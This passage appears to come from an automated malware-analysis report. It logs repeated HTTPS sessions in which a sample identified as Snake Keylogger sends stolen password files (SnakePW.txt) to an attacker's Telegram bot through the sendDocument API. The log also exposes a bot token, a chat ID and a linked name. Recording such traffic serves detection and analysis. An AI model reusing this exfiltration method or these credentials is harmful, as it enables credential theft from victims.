                            Data Ascii: {"ok":true,"result":{"message_id":67013,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            235192.168.2.550146149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:19 UTC396OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575710b1f912
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:19 UTC397OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 62 31 66 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575710b1f912Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:20 UTC397INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:20 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:20 UTC398INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67014,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228859,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            236192.168.2.550147149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:20 UTC398OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575710e8ce44
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:20 UTC398OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 30 65 38 63 65 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575710e8ce44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:20 UTC399INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:20 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:20 UTC399INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67015,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228860,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            237192.168.2.550148149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:20 UTC400OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757112469db
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:20 UTC400OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 32 34 36 39 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757112469dbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:20 UTC401INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:20 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:20 UTC401INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67016,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228860,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            238192.168.2.550149149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:20 UTC401OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571162661f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:20 UTC402OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 36 32 36 36 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571162661fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:21 UTC402INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:21 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:21 UTC403INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67018,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            239192.168.2.550150149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:21 UTC403OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571196da58
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:21 UTC403OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 39 36 64 61 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571196da58Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:21 UTC404INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:21 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:21 UTC404INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67019,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.549792149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:48 UTC40OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756da20995d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:48 UTC40OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 32 30 39 39 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756da20995dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:48 UTC41INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:48 UTC41INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66771,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            240192.168.2.550151149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:21 UTC405OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575711d4d6c1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:21 UTC405OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 31 64 34 64 36 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575711d4d6c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:21 UTC406INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:21 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:21 UTC406INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67020,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228861,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            241192.168.2.550152149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:22 UTC406OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575712094b6b
                            Host: api.telegram.org
                            Content-Length: 504
